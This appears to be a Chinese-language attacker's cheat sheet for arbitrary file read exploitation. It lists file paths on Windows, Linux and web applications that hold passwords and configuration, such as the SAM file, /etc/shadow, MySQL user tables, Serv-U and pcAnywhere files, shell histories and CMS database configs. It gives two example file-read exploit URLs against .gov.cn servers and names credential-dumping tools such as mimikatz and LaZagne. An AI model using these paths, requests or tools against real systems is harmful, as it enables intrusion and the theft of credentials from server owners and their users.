Windows
c:/boot.ini #查看系統版本 c:/windows/php.ini #php配置信息 c:/windows/my.ini #MYSQL配置文件,記錄管理員登陸過的MYSQL用戶名和密碼 c:/winnt/php.ini c:/winnt/my.ini c:\mysql\data\mysql\user.MYD #mysql.user表中的數據庫連接密碼 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini #存儲了虛擬主機網站路徑和密碼 c:\Program Files\Serv-U\ServUDaemon.ini c:\windows\system32\inetsrv\MetaBase.xml #查看IIS的虛擬主機配置 c:\windows\repair\sam #WINDOWS系統初次安裝的密碼 c:\Program Files\ Serv-U\ServUAdmin.exe #6.0版本以前的serv-u管理員密碼 c:\Program Files\RhinoSoft.com\ServUDaemon.exe C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件 #存儲了pcAnywhere的登陸密碼 c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf #查看WINDOWS系統apache文件 c:/Resin-3.0.14/conf/resin.conf #查看jsp開發的網站resin文件配置信息. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf #查看linux系統配置的JSP虛擬主機 d:\APACHE\Apache2\conf\httpd.conf C:\Program Files\mysql\my.ini C:\mysql\data\mysql\user.MYD #存在MYSQL系統中的用戶密碼
C:\Windows\System32\drivers\etc\hosts
winserver配置
Telnet信息
Linux/Unix
/usr/local/app/apache2/conf/httpd.conf #apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf #虛擬網站設置 /usr/local/app/php5/lib/php.ini #PHP相關設置 /etc/sysconfig/iptables #從中得到防火牆規則策略 /etc/httpd/conf/httpd.conf #apache配置文件 /etc/rsyncd.conf #同步程序配置文件 /etc/my.cnf #mysql的配置文件 /etc/redhat-release #系統版本 /etc/issue /etc/issue.net
etc/passwd #存儲操作系統用戶信息,該文件為所有用戶可見
用戶名: 密碼 : uid : gid :用戶描述:主目錄:登陸shell
密碼:x表示暗文,相反為明文
uid:userid,”0”為root ID.1-99為系統保留,分配給系統預定義帳號。Linux用戶可以分為3類:超級用戶(root)、管理用戶和普通用戶
偽用戶(psuedo users)
bin #擁有可執行的用戶命令文件
sys #擁有系統文件
adm #擁有賬戶文件
uucp #UUCP使用
Ip #Ip或lpd子系統使用
nobody #NFS使用
audit
cron
usenet
gid:字段記錄的是用戶所屬的用戶組。對應着/etc/group文件中的一條記錄
用戶描述
:字段記錄着用戶的一些個人情況,例如用戶的真實姓名、電話、地址等
主目錄
:用戶的起始工作目錄
登陸shell
:
常用shell - sh(BourneShell),csh(CShell),ksh(KornShell),tcsh(TENEX/TOPS-20typeCShell),bash(BourneAgainShell)
/bin/sh #默認登錄Shell /sbin/nologin #代表用戶不能登錄
/etc/shadow
username: passwd: lastchg: min: max: warn: inactive: expire: flag
登錄名:加密口令:最后一次修改時間:最小時間間隔:最大時間間隔:警告時間:不活動時間:失效時間:標志
口令 - 加密后的用戶口令字,13個字符;如果為空/用戶沒有口令;如含有不屬於集合{./0-9A-Za-z}中的字符/用戶不能登錄
最后一次修改時間 - 表示的是從某個時刻起,到用戶最后一次修改口令時的天數。時間起點對不同的系統可能不同
最小時間間隔 - 兩次修改口令之間所需的最小天數
最大時間間隔 - 口令保持有效的最大天數
警告時間 - 從系統開始警告用戶到用戶密碼正式失效之間的天數
不活動時間 - 用戶沒有登錄活動但賬號仍能保持有效的最大天數
失效時間 - 賬號的生存期。
保留條目 - 無用字段
/etc/group 存儲有關本地用戶組的信息
一個組中可以有多個用戶,一個用戶也可以屬於不同的組。當一個用戶同時是多個組中的成員時,在/etc/passwd文件中記錄的是登錄時所屬的默認組
用戶要訪問屬於附加組的文件時,必須首先使用newgrp命令使自己成為所要訪問的組中的成員
1)groupname GID #組名
2)password #密碼位置
3)GID #組ID
4)user #組成員
/usr/local/app/php5/lib/php.ini
#
PHP相關設置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf
#
虛擬網站設置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/
httpd.conf #linux APACHE虛擬主機配置文件
/usr/local/resin-
3.0.
22/conf/resin.conf #3.
0
.22的RESIN配置文件
/usr/local/resin-pro-3.0.22/conf/resin.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf #APASHE虛擬主機
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf #linux APACHE虛擬主機配置文件
/usr/local/resin-3.0.22/conf/resin.conf #3.0.22的RESIN配置文件
/usr/local/resin-pro-3.0.22/conf/resin.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf #APASHE虛擬主機
/etc/sysconfig/iptables #查看防火牆策略
/root/.mysql_history、/root/.bash_history #Mysql賬號密碼信息
Mac
/.DS_Store #可查看網站結構部署
通用型
數據庫信息路徑 dedecms - data/common.inc.php, Discuz - /config/config_global_default.php config /config_ucenter.php /config.inc.php 通用數據庫信息路徑 - config、application、conn、db 通用配置文件路徑 - conn.asp/php/aspx/jsp /WEB-INF/config/config.properties
日志中獲取Mysql賬號密碼信息 mysqlbinlog binlog.000001
JBOSS
http://www.XX.gov.cn/fileFetcherServlet?filePath=D:\HIGHCOM\jboss-4.0.4.GA\jboss-4.0.4.GA\server\default\deploy\xzsp_hrb_oracle.war\web.xml
TOMCAT
http://www.XX.gov.cn:8080/fileFetcherServlet?filePath=E:\hrbweb\WebRoot\WEB-INF\web.xml
獲取當前用戶密碼工具
Windows mimikatz/wce/Invoke-WCMDump/mimiDbg/LaZagne/nirsoft_package/QuarksPwDump fgdump/星號查看器 Linux LaZagne/mimipenguin